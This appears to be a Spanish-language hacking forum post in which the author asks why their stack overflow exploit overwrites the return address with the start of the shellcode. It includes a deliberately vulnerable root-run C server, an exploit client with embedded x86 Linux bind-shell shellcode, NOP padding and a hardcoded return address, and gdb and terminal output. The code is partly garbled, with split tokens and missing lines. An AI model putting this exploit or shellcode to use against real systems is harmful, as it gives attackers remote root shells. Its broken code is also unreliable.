Vale, ahora estaba pasando todo a limpio con una shellcode buena, y me ha salido este error al escribir el exploit...
El fallo está en que me sobreescribe el RET con en el principio de la shellcode (9958666a == 0x6a 0x66 0x58 0x99 ...)
¿Qué le pasa?
Serv#include <sys/socket.h>
#include <arpa/inet.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <signal.h>
#include <time.h>
int sockfd, newsock;
void shutup (int signal)
{
times ();
printf ("Shutting down...\n\n"); close (newsock);
close (sockfd);
}
int times ()
{
struct tm *ahora;
char buffer [40];
strftime (buffer
, 40, "%d/%m/%Y %H:%M:%S" , ahora
); return 0;
}
int handle_conection (char *buffer)
{
char buff [256];
times ();
printf ("[0x%08x]: %s\n", &buff
, buff
);
return 0;
}
int main (int argc, char *argv [])
{
struct tm *ahora;
char hora [40];
strftime (hora
, 40, "%d/%m/%Y %H:%M:%S" , ahora
); printf ("SmallServ 2.0 - By Sagrini - Sagrini 2010 - %s\n", hora
);
if (getuid()!=0)
{
printf ("This proccess must be run by root.\n\n"); return 1;
}
if (argc<2)
{
printf ("Use: %s <PORT>\n\n", argv
[0]); return 1;
}
int cont;
struct sockaddr_in client, host;
char buffer [1024];
int size=sizeof (client);
sockfd=socket (2, 1 , 0);
host.sin_family=AF_INET;
host.
sin_port=htons
(atoi (argv
[1])); host.sin_addr.s_addr=0;
bind (sockfd, (struct sockaddr*)&host, sizeof (struct sockaddr));
listen (sockfd, 3);
times ();
printf ("Starting up...\n\n");
signal (SIGTERM, shutup);
signal (SIGINT, shutup);
while (1)
{
newsock=accept (sockfd, (struct sockaddr*)&client, &size);
times ();
printf ("Got connection from %s:%d\n", inet_ntoa
(client.
sin_addr), ntohs
(client.
sin_port));
cont=recv (newsock, &buffer, 1024, 0);
while (cont > 1)
{
handle_conection (buffer);
cont=recv (newsock, &buffer, 1024, 0);
}
times ();
printf ("Finishing connection from %s:%d\n\n", inet_ntoa
(client.
sin_addr), ntohs
(client.
sin_port)); close (newsock);
}
close (sockfd);
return 0;
}
Exploit#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <arpa/inet.h>
#include <sys/socket.h>
int main (int argc, char *argv [])
{
printf ("Vuln 2.0 Exploit 0.1 : Sagrini 2011 : elhacker.net\n"); if (argc != 3)
{
printf ("!!! Use: %s <target_ip> <port>\n\n", argv
[0]); return 1;
}
printf ("Creating socket...\t"); struct sockaddr_in host; int sockfd;
host.sin_family = AF_INET;
host.
sin_port = htons
(atoi (argv
[2])); host.sin_addr.s_addr = inet_addr (argv [1]);
if ((sockfd=socket (2, 1, 0))==-1)
{
return 1;
}
printf ("Conecting target...\t"); if ((connect (sockfd, (struct sockaddr*)&host, sizeof (host)))==-1)
{
return 1;
}
printf ("Creating buffer...\t"); char nops [168];
char shellcode [93] = "\x6a\x66\x58\x99\x31\xdb\x43\x52\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x96\x6a\x66\x58"
"\x43\x52\x66\x68\x7a\x69\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\xb0\x66"
"\x43\x43\x53\x56\x89\xe1\xcd\x80\xb0\x66\x43\x52\x52\x56\x89\xe1\xcd\x80\x93\x6a"
"\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62"
"\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80";
char ret [6] = "\x30\xf8\xff\xbf\x90";
char command [265];
printf ("Sending buffer...\t"); if (send
(sockfd
, &command
, strlen (command
), 0)==-1) {
return 1;
}
FILE
*fp
= fopen ("a.txt", "w+");
printf ("Now you can exec NC [nc -vv localhost 5074]\nBe good!\n\n"); return 0;
}
Root Shell1 GDB serv(gdb) r 31330
Starting program: /home/juanra/Escritorio/Serv/serv 31330
SmallServ 2.0 - By Sagrini - Sagrini 2010 - 02/03/2011 19:50:08
02/03/2011 19:50:08 Starting up...
02/03/2011 19:50:11 Got connection from 127.0.0.1:41991
02/03/2011 19:50:11 [0xbffff6f8]: ������������������������������������������������������������������������������������������������������������������������������������������������������������������������jfX�1�CRjj��̀�jfXCRfhzifS��jQV��̀�fCCSV��̀�fCRRV��̀�jY�?̀Iy��
Rh//shh/bin��R��S��̀jfX�1�CRjj��̀�jfXCRfhzifS��jQV��̀�fCCSV��̀�fCRRV��̀�jY�?̀Iy��
Rh//shh/bin��R��S��̀0����n����������
�����(跢%���y���y��(���1���1����y���y��(���1����������
Program received signal SIGSEGV, Segmentation fault.
0x9958666a in ?? ()
(gdb)
User Shell2 Exploitjuanra@Juanra:~/Escritorio/Serv$ ./exploit 127.0.0.1 31330
Vuln 2.0 Exploit 0.1 : Sagrini 2011 : elhacker.net
Creating socket... [OK]
Conecting target... [OK]
Creating buffer... [OK]
Sending buffer... [OK]
Now you can exec NC [nc -vv localhost 5074]
Be good!
juanra@Juanra:~/Escritorio/Serv$
Gracias y un saludo!
Sagrini